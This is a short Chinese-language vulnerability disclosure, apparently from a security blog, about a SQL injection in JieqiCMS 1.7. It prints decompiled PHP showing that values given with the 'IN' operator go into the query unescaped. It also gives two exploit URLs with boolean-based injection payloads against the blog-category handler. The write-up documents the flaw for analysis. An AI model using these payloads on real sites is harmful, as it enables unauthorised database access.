杰奇CMS 1.7商业版注入漏洞

杰奇CMS 1.7商业版用了Zend加密,批量解密后,发现程序员用了几个函数,使得这套系统基本没了注入漏洞。在判断ip时,程序员将.过滤再判断是否是为数字,值得借鉴。
[php]
class criteria extends criteriaelement

{

var $column; //字段

var $operator; //分隔符

var $value; //值

function criteria( $_obfuscate_eZJe9OBy, $_obfuscate_VgKtFeg = "", $_obfuscate_JChWBNMCFOA = "=" )

{

$this->column = $_obfuscate_eZJe9OBy;

$this->value = $_obfuscate_VgKtFeg;

$this->operator = $_obfuscate_JChWBNMCFOA;

}

function render( )

{

if ( !empty( $this->column ) )

{

$_obfuscate_yHkENun4 = $this->column." ".$this->operator;

..................................

if ( isset( $this->value ) )

..................................

//当分隔符为in时没有对值有任何处理。EditPlus搜索含有"IN"的语句发现了注入。

if ( strtoupper( $this->operator ) == "IN" )

{

$_obfuscate_yHkENun4 .= " ".$this->value;

return $_obfuscate_yHkENun4;

}

//引入单引号

$_obfuscate_yHkENun4 .= " '".jieqi_dbslashes( trim( $this->value ) )."'";

}

return $_obfuscate_yHkENun4;

------------------------------------------------------------------------------------------

switch ( $_REQUEST[action] )

{

case "do_edit" :

include_once( $jieqiModules['space']['path']."/class/blogcat.php" );

$blog_cat_handler = jieqispaceblogcathandler::getinstance( "JieqiSpaceBlogCatHandler" );

if ( $_REQUEST['delete_checkbox'] )

{

$tmpstr = "(".implode( ",", $_REQUEST['delete_checkbox'] ).")";

$criteria = new criteriacompo( new criteria( "`id`", $tmpstr, "in" ) ); //id in ()

$criteria->add( new criteria( "`uid`", $uid ) );

$criteria->add( new criteria( "`type`", $_REQUEST['type'], "=" ) );

$criteria->add( new criteria( "`default_cat`", 1, "!=" ) );

$blog_cat_handler->queryobjects( $criteria );

$v = $blog_cat_handler->getobject( );

if ( !empty( $v ) )

{

$num = $v->getvar( "num" );

$blog_cat_handler->delete( $criteria );

unset( $criteria );

}[/php]

exp:
http://0day5.com/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=1%23

http://0day5.com/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=2%23

发表评论